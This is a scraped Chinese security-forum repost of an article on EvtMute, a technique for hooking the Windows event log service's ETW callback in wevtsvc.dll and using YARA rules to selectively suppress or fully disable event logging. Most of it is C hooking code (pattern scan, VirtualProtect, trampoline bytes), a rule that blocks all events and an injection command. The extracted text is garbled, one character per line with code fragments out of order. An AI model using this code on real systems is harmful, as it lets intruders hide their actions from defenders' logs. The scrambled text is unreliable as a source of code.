论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[15926] 2020-10-04_安全研究YARA规则阻止Windows事件日志记录
文档创建者:
s7ckTeam
浏览次数:
3
最后更新:
2025-01-18
IOT
3 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2020-10-04_安全研究YARA规则阻止Windows事件日志记录
安
全
研
究
|
Y
A
R
A
规
则
阻
止
W
i
n
d
o
w
s
事
件
日
志
记
录
A
l
p
h
a
_
h
4
c
k
F
r
e
e
B
u
f
2
0
2
0
-
1
0
-
0
4
写
在
前
面
的
话
写
在
前
面
的
话
事
件
日
志
搭
配
W
i
n
d
o
w
s
事
件
转
发
和
S
y
s
m
o
n
,
将
会
成
为
一
个
非
常
强
大
的
安
全
防
御
方
案
,
可
以
帮
助
研
究
人
员
检
测
攻
击
者
在
目
标
设
备
上
的
每
一
步
非
法
操
作
。
很
明
显
,
这
是
攻
击
者
需
要
解
决
的
问
题
。
如
果
不
能
实
现
提
权
的
话
,
攻
击
者
能
绕
过
事
件
日
志
的
方
式
还
是
有
限
的
,
一
旦
实
现
提
权
,
那
结
果
可
就
不
同
了
。
那
么
,
怎
么
做
才
能
在
过
滤
掉
攻
击
活
动
日
志
的
同
时
,
保
留
住
正
常
的
事
件
日
志
呢
?
几
年
之
前
,
@
h
l
l
d
z
曾
发
布
过
一
款
名
叫
I
n
v
o
k
e
-
P
h
a
n
t
0
m
的
工
具
。
这
是
一
款
W
i
n
d
o
w
s
日
志
清
理
工
具
,
它
可
以
找
到
目
标
事
件
对
应
的
进
程
,
然
后
终
止
掉
所
有
通
过
w
e
v
t
s
v
c
.
d
l
l
运
行
的
线
程
。
这
是
因
为
w
e
v
t
s
v
c
.
d
l
l
是
一
个
事
件
日
志
服
务
,
因
此
终
止
它
以
及
相
关
线
程
就
可
以
禁
用
掉
日
志
记
录
功
能
了
。
但
是
,
这
样
将
停
用
所
有
的
事
件
日
志
。
那
么
为
了
解
决
这
个
问
题
,
我
们
需
要
实
现
I
n
v
o
k
e
-
P
h
a
n
t
0
m
类
似
的
功
能
,
但
需
要
支
持
事
件
报
告
过
滤
,
这
样
就
可
以
只
阻
止
与
恶
意
行
为
相
关
的
事
件
被
记
录
了
。
逆
向
分
析
事
件
日
志
服
务
逆
向
分
析
事
件
日
志
服
务
在
对
w
e
v
t
s
v
c
.
d
l
l
分
析
的
过
程
中
,
我
们
发
现
它
会
通
过
O
p
e
n
T
r
a
c
e
W
来
打
开
一
个
追
踪
会
话
:
O
p
e
n
T
r
a
c
e
W
使
用
E
V
E
N
T
_
T
R
A
C
E
_
L
O
G
F
I
L
E
W
结
构
体
作
为
参
数
,
这
个
结
构
体
包
含
了
E
v
e
n
t
R
e
c
o
r
d
C
a
l
l
b
a
c
k
的
值
,
它
指
向
目
标
事
件
的
一
个
回
调
函
数
。
使
用
w
i
n
d
b
g
进
行
深
入
分
析
后
,
我
发
现
这
个
回
调
函
数
就
是
w
e
v
t
s
v
c
!
E
t
w
E
v
e
n
t
C
a
l
l
b
a
c
k
:
通
过
对
回
调
函
数
代
码
进
行
反
汇
编
,
我
发
现
它
是
一
个
调
用
了
E
v
e
n
t
C
a
l
l
b
a
c
k
的
程
序
集
:
在
w
e
v
t
s
v
c
!
E
t
w
E
v
e
n
t
C
a
l
l
b
a
c
k
上
设
置
断
点
,
我
们
就
会
发
现
它
将
在
E
V
E
N
T
_
R
E
C
O
R
D
结
构
体
中
接
收
事
件
信
息
:
E
V
E
N
T
_
H
E
A
D
E
R
结
构
体
中
包
含
了
大
量
事
件
详
细
信
息
,
包
括
报
告
事
件
的
提
供
方
,
在
w
i
n
d
b
g
的
帮
助
下
,
我
们
可
以
获
取
到
提
供
方
的
G
U
I
D
:
拿
到
事
件
提
供
方
的
G
U
I
D
后
,
我
们
就
可
以
使
用
l
o
g
m
a
n
.
e
x
e
来
查
询
提
供
方
身
份
了
,
这
里
我
们
可
以
看
到
提
供
方
就
是
M
i
c
r
o
s
o
f
t
-
W
i
n
d
o
w
s
-
S
y
s
m
o
n
:
我
们
可
以
在
这
里
通
过
添
加
一
个
r
e
t
命
令
来
篡
改
该
函
数
,
并
阻
止
所
有
的
事
件
报
告
生
成
:
在
下
图
中
,
你
可
以
看
到
我
清
楚
掉
了
一
条
7
:
0
1
创
建
的
事
件
日
志
,
并
在
7
:
0
4
时
添
加
了
一
个
新
用
户
,
但
是
这
个
操
作
没
有
被
记
录
下
来
,
因
为
我
们
在
回
调
t
y
p
e
d
e
f
s
t
r
u
c
t
_
E
V
E
N
T
_
R
E
C
O
R
D
{
E
V
E
N
T
_
H
E
A
D
E
R
E
v
e
n
t
H
e
a
d
e
r
;
E
T
W
_
B
U
F
F
E
R
_
C
O
N
T
E
X
T
B
u
f
f
e
r
C
o
n
t
e
x
t
;
U
S
H
O
R
T
E
x
t
e
n
d
e
d
D
a
t
a
C
o
u
n
t
;
U
S
H
O
R
T
U
s
e
r
D
a
t
a
L
e
n
g
t
h
;
P
E
V
E
N
T
_
H
E
A
D
E
R
_
E
X
T
E
N
D
E
D
_
D
A
T
A
_
I
T
E
M
E
x
t
e
n
d
e
d
D
a
t
a
;
P
V
O
I
D
U
s
e
r
D
a
t
a
;
P
V
O
I
D
U
s
e
r
C
o
n
t
e
x
t
;
}
E
V
E
N
T
_
R
E
C
O
R
D
,
*
P
E
V
E
N
T
_
R
E
C
O
R
D
;
函
数
代
码
中
添
加
的
r
e
t
指
令
能
够
让
系
统
范
围
内
的
所
有
事
件
都
不
会
被
报
告
:
设
置
函
数
钩
子
设
置
函
数
钩
子
P
o
C
正
常
执
行
后
,
我
们
就
可
以
看
是
编
写
漏
洞
利
用
代
码
了
。
我
们
需
要
做
的
第
一
件
事
就
是
找
到
w
e
v
t
s
v
c
!
E
t
w
E
v
e
n
t
C
a
l
l
b
a
c
k
的
偏
移
量
,
这
样
我
们
就
知
道
应
该
把
函
数
钩
子
设
置
在
哪
里
了
。
首
先
,
我
们
要
定
位
w
e
v
t
s
v
c
.
d
l
l
的
基
地
址
。
下
面
的
代
码
可
以
获
取
该
地
址
,
并
存
储
至
d
w
B
a
s
e
变
量
中
:
接
下
来
,
使
用
w
i
n
d
b
g
来
进
行
反
汇
编
来
查
看
回
调
开
始
时
的
字
节
位
置
,
然
后
进
行
内
存
扫
描
,
找
到
这
些
字
节
之
后
,
我
们
也
就
找
到
了
设
置
钩
子
的
地
方
了
:
下
面
这
段
代
码
将
搜
索
从
w
e
v
t
s
v
c
.
d
l
l
基
地
址
的
起
始
字
节
0
x
f
f
f
f
f
,
以
找
到
4
8
8
3
e
c
3
8
4
c
8
b
0
d
:
D
W
O
R
D
_
P
T
R
d
w
B
a
s
e
;
D
W
O
R
D
i
,
d
w
S
i
z
e
N
e
e
d
e
d
;
H
M
O
D
U
L
E
h
M
o
d
u
l
e
s
[
1
0
2
4
0
0
]
;
T
C
H
A
R
s
z
M
o
d
u
l
e
[
M
A
X
_
P
A
T
H
]
;
i
f
(
E
n
u
m
P
r
o
c
e
s
s
M
o
d
u
l
e
s
(
G
e
t
C
u
r
r
e
n
t
P
r
o
c
e
s
s
(
)
,
h
M
o
d
u
l
e
s
,
s
i
z
e
o
f
(
h
M
o
d
u
l
e
s
)
,
&
d
w
S
i
z
e
N
e
e
d
e
d
)
)
{
f
o
r
(
i
n
t
i
=
0
;
i
<
(
d
w
S
i
z
e
N
e
e
d
e
d
/
s
i
z
e
o
f
(
H
M
O
D
U
L
E
)
)
;
i
+
+
)
{
Z
e
r
o
M
e
m
o
r
y
(
(
P
V
O
I
D
)
s
z
M
o
d
u
l
e
,
M
A
X
_
P
A
T
H
)
;
i
f
(
G
e
t
M
o
d
u
l
e
B
a
s
e
N
a
m
e
A
(
G
e
t
C
u
r
r
e
n
t
P
r
o
c
e
s
s
(
)
,
h
M
o
d
u
l
e
s
[
i
]
,
(
L
P
S
T
R
)
s
z
M
o
d
u
l
e
,
s
i
z
e
o
f
(
s
z
M
o
d
u
l
e
)
/
s
i
z
e
o
f
(
T
C
H
A
R
)
)
)
{
i
f
(
!
s
t
r
c
m
p
(
"
w
e
v
t
s
v
c
.
d
l
l
"
,
(
c
o
n
s
t
c
h
a
r
*
)
s
z
M
o
d
u
l
e
)
)
{
d
w
B
a
s
e
=
(
D
W
O
R
D
_
P
T
R
)
h
M
o
d
u
l
e
s
[
i
]
;
}
}
}
}
#
d
e
f
i
n
e
P
A
T
T
E
R
N
"
x
4
8
x
8
3
x
e
c
x
3
8
x
4
c
x
8
b
x
0
d
"
获
取
到
偏
移
量
后
,
我
们
可
以
调
用
m
e
m
c
p
y
来
拷
贝
字
节
位
置
:
但
是
,
如
果
想
要
报
告
那
些
我
们
不
需
要
阻
止
的
事
件
,
我
们
就
需
要
恢
复
原
先
的
回
调
执
行
了
,
因
此
我
们
还
需
要
在
它
报
告
合
法
事
件
之
后
,
重
新
设
置
钩
子
,
以
便
捕
捉
后
续
事
件
。
这
里
我
们
可
以
使
用
一
个
t
y
p
e
d
e
f
来
实
现
:
t
D
W
O
R
D
i
;
L
P
V
O
I
D
l
p
C
a
l
l
b
a
c
k
O
f
f
s
e
t
;
f
o
r
(
i
=
0
;
i
<
0
x
f
f
f
f
f
;
i
+
+
)
{
i
f
(
!
m
e
m
c
m
p
(
(
P
V
O
I
D
)
(
d
w
B
a
s
e
+
i
)
,
(
u
n
s
i
g
n
e
d
c
h
a
r
*
)
P
A
T
T
E
R
N
,
s
t
r
l
e
n
(
P
A
T
T
E
R
N
)
)
)
{
l
p
C
a
l
l
b
a
c
k
O
f
f
s
e
t
=
(
L
P
V
O
I
D
)
(
d
w
B
a
s
e
+
i
)
;
}
}
m
e
m
c
p
y
(
O
r
i
g
i
n
a
l
B
y
t
e
s
,
l
p
C
a
l
l
b
a
c
k
O
f
f
s
e
t
,
5
0
)
;
接
下
来
,
设
置
一
个
钩
子
来
将
所
有
针
对
E
t
w
E
v
e
n
t
C
a
l
l
b
a
c
k
的
调
用
重
定
向
到
E
t
w
C
a
l
l
b
a
c
k
H
o
o
k
:
V
O
I
D
H
o
o
k
E
t
w
C
a
l
l
b
a
c
k
(
)
{
D
W
O
R
D
o
l
d
P
r
o
t
e
c
t
,
o
l
d
O
l
d
P
r
o
t
e
c
t
;
u
n
s
i
g
n
e
d
c
h
a
r
b
o
i
n
g
[
]
=
{
0
x
4
9
,
0
x
b
b
,
0
x
d
e
,
0
x
a
d
,
0
x
c
0
,
0
x
d
e
,
0
x
d
e
,
0
x
a
d
,
0
x
c
0
,
0
x
d
e
,
0
x
4
1
,
0
x
f
f
,
0
x
e
3
}
;
*
(
v
o
i
d
*
*
)
(
b
o
i
n
g
+
2
)
=
&
E
t
w
C
a
l
l
b
a
c
k
H
o
o
k
;
V
i
r
t
u
a
l
P
r
o
t
e
c
t
(
l
p
C
a
l
l
b
a
c
k
O
f
f
s
e
t
,
1
3
,
P
A
G
E
_
E
X
E
C
U
T
E
_
R
E
A
D
W
R
I
T
E
,
&
o
l
d
P
r
o
t
e
c
t
)
;
m
e
m
c
p
y
(
l
p
C
a
l
l
b
a
c
k
O
f
f
s
e
t
,
b
o
i
n
g
,
s
i
z
e
o
f
(
b
o
i
n
g
)
)
;
V
i
r
t
u
a
l
P
r
o
t
e
c
t
(
l
p
C
a
l
l
b
a
c
k
O
f
f
s
e
t
,
1
3
,
o
l
d
P
r
o
t
e
c
t
,
&
o
l
d
O
l
d
P
r
o
t
e
c
t
)
;
r
e
t
u
r
n
;
}
y
p
e
d
e
f
V
O
I
D
(
W
I
N
A
P
I
*
E
t
w
E
v
e
n
t
C
a
l
l
b
a
c
k
_
)
(
E
V
E
N
T
_
R
E
C
O
R
D
*
E
v
e
n
t
R
e
c
o
r
d
)
;
V
O
I
D
D
o
O
r
i
g
i
n
a
l
E
t
w
C
a
l
l
b
a
c
k
(
E
V
E
N
T
_
R
E
C
O
R
D
*
E
v
e
n
t
R
e
c
o
r
d
)
{
D
W
O
R
D
d
w
O
l
d
P
r
o
t
e
c
t
;
V
i
r
t
u
a
l
P
r
o
t
e
c
t
(
l
p
C
a
l
l
b
a
c
k
O
f
f
s
e
t
,
s
i
z
e
o
f
(
O
r
i
g
i
n
a
l
B
y
t
e
s
)
,
P
A
G
E
_
E
X
E
C
U
T
E
_
R
E
A
D
W
R
I
T
E
,
&
d
w
O
l
d
P
r
o
t
e
c
t
)
;
m
e
m
c
p
y
(
l
p
C
a
l
l
b
a
c
k
O
f
f
s
e
t
,
O
r
i
g
i
n
a
l
B
y
t
e
s
,
s
i
z
e
o
f
(
O
r
i
g
i
n
a
l
B
y
t
e
s
)
)
;
V
i
r
t
u
a
l
P
r
o
t
e
c
t
(
l
p
C
a
l
l
b
a
c
k
O
f
f
s
e
t
,
s
i
z
e
o
f
(
O
r
i
g
i
n
a
l
B
y
t
e
s
)
,
d
w
O
l
d
P
r
o
t
e
c
t
,
&
d
w
O
l
d
P
r
o
t
e
c
t
)
;
E
t
w
E
v
e
n
t
C
a
l
l
b
a
c
k
_
E
t
w
E
v
e
n
t
C
a
l
l
b
a
c
k
=
(
E
t
w
E
v
e
n
t
C
a
l
l
b
a
c
k
_
)
l
p
C
a
l
l
b
a
c
k
O
f
f
s
e
t
;
完
成
上
述
操
作
之
后
,
我
们
就
能
够
找
到
E
T
W
回
调
函
数
的
偏
移
量
,
然
后
将
其
挂
钩
到
我
们
自
己
的
函
数
并
解
析
数
据
,
最
终
解
除
回
调
并
报
告
事
件
。
我
们
可
以
在
w
i
n
d
b
g
中
看
到
解
析
后
的
事
件
:
Y
A
R
A
与
模
式
匹
配
与
模
式
匹
配
接
下
来
,
我
们
就
要
实
现
日
志
过
滤
器
了
。
在
这
里
,
我
定
义
了
下
列
宏
来
保
持
代
码
风
格
一
致
性
:
下
面
的
代
码
将
创
建
一
个
Y
A
R
A
规
则
中
对
象
,
并
在
Y
R
R
u
l
e
s
S
c
a
n
M
e
m
中
使
用
:
E
t
w
E
v
e
n
t
C
a
l
l
b
a
c
k
(
E
v
e
n
t
R
e
c
o
r
d
)
;
H
o
o
k
E
t
w
C
a
l
l
b
a
c
k
(
)
;
}
#
d
e
f
i
n
e
R
U
L
E
_
A
L
L
O
W
_
A
L
L
"
r
u
l
e
A
l
l
o
w
{
c
o
n
d
i
t
i
o
n
:
f
a
l
s
e
}
"
Y
R
I
n
i
t
a
l
i
z
e
(
)
;
R
t
l
C
o
p
y
M
e
m
o
r
y
(
c
R
u
l
e
,
R
U
L
E
_
A
L
L
O
W
_
A
L
L
,
s
t
r
l
e
n
(
R
U
L
E
_
A
L
L
O
W
_
A
L
L
)
)
;
i
f
(
Y
R
C
o
m
p
i
l
e
r
C
r
e
a
t
e
(
&
y
r
C
o
m
p
i
l
e
r
)
!
=
E
R
R
O
R
_
S
U
C
C
E
S
S
)
{
r
e
t
u
r
n
-
1
;
}
i
f
(
Y
R
C
o
m
p
i
l
e
r
A
d
d
S
t
r
i
n
g
(
y
r
C
o
m
p
i
l
e
r
,
c
R
u
l
e
,
N
U
L
L
)
!
=
E
R
R
O
R
_
S
U
C
C
E
S
S
)
Y
A
R
A
规
则
写
好
后
,
我
们
就
可
以
开
始
扫
描
内
存
了
。
下
面
我
们
会
扫
描
包
含
格
式
化
事
件
内
容
的
S
t
r
i
n
g
B
u
f
f
e
r
变
量
,
并
将
结
果
传
递
给
Y
A
R
A
回
调
函
数
T
o
R
e
p
o
r
t
O
r
N
o
t
T
o
R
e
p
o
r
t
T
h
a
t
I
s
T
h
e
Q
u
e
s
t
i
o
n
。
该
函
数
将
根
据
规
则
是
否
匹
配
而
将
d
w
R
e
p
o
r
t
变
量
设
置
为
0
或
1
。
如
果
P
I
P
E
_
N
A
M
E
变
量
出
现
在
事
件
中
,
还
需
要
对
其
进
行
检
查
。
因
为
E
v
t
M
u
t
e
H
o
o
k
.
d
l
l
将
使
用
一
个
命
名
管
道
来
动
态
更
新
当
前
规
则
,
这
将
会
生
成
事
件
日
志
,
所
以
这
个
检
查
将
确
保
这
些
事
件
日
志
不
会
被
报
告
:
{
r
e
t
u
r
n
-
1
;
}
Y
R
C
o
m
p
i
l
e
r
G
e
t
R
u
l
e
s
(
y
r
C
o
m
p
i
l
e
r
,
&
y
r
R
u
l
e
s
)
;
I
N
T
T
o
R
e
p
o
r
t
O
r
N
o
t
T
o
R
e
p
o
r
t
T
h
a
t
I
s
T
h
e
Q
u
e
s
t
i
o
n
(
Y
R
_
S
C
A
N
_
C
O
N
T
E
X
T
*
C
o
n
t
e
x
t
,
I
N
T
M
e
s
s
a
g
e
,
P
V
O
I
D
p
M
e
s
s
a
g
e
D
a
t
a
,
P
V
O
I
D
p
U
s
e
r
D
a
t
a
)
{
i
f
(
M
e
s
s
a
g
e
=
=
C
A
L
L
B
A
C
K
_
M
S
G
_
R
U
L
E
_
M
A
T
C
H
I
N
G
)
{
(
*
(
i
n
t
*
)
p
U
s
e
r
D
a
t
a
)
=
1
;
}
i
f
(
M
e
s
s
a
g
e
=
=
C
A
L
L
B
A
C
K
_
M
S
G
_
R
U
L
E
_
N
O
T
_
M
A
T
C
H
I
N
G
)
{
(
*
(
i
n
t
*
)
p
U
s
e
r
D
a
t
a
)
=
0
;
}
r
e
t
u
r
n
C
A
L
L
B
A
C
K
_
C
O
N
T
I
N
U
E
;
}
Y
R
R
u
l
e
s
S
c
a
n
M
e
m
(
y
r
R
u
l
e
s
,
(
u
i
n
t
8
_
t
*
)
S
t
r
i
n
g
B
u
f
f
e
r
,
s
t
r
l
e
n
(
S
t
r
i
n
g
B
u
f
f
e
r
)
,
0
,
T
o
R
e
p
o
r
t
O
r
N
o
t
T
o
R
e
p
o
r
t
T
h
a
t
I
s
T
h
e
Q
u
e
s
t
i
o
n
,
&
d
w
R
e
p
o
r
t
,
0
)
;
i
f
(
d
w
R
e
p
o
r
t
=
=
0
)
{
i
f
(
s
t
r
s
t
r
(
S
t
r
i
n
g
B
u
f
f
e
r
,
P
I
P
E
_
N
A
M
E
)
=
=
N
U
L
L
)
{
D
o
O
r
i
g
i
n
a
l
E
t
w
C
a
l
l
b
a
c
k
(
E
v
e
n
t
R
e
c
o
r
d
)
;
}
}
禁
用
所
有
日
志
记
录
禁
用
所
有
日
志
记
录
我
们
可
以
使
用
下
列
Y
A
R
A
规
则
来
在
系
统
范
围
内
禁
用
事
件
日
志
记
录
:
接
下
来
,
将
钩
子
注
入
到
事
件
服
务
中
:
设
置
好
钩
子
后
,
还
需
要
添
加
过
滤
器
:
现
在
,
所
有
的
事
件
都
不
会
被
记
录
。
精
彩
推
荐
精
彩
推
荐
r
u
l
e
d
i
s
a
b
l
e
{
c
o
n
d
i
t
i
o
n
:
t
r
u
e
}
.
S
h
a
r
p
E
v
t
M
u
t
e
.
e
x
e
-
-
I
n
j
e
c
t
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
IOT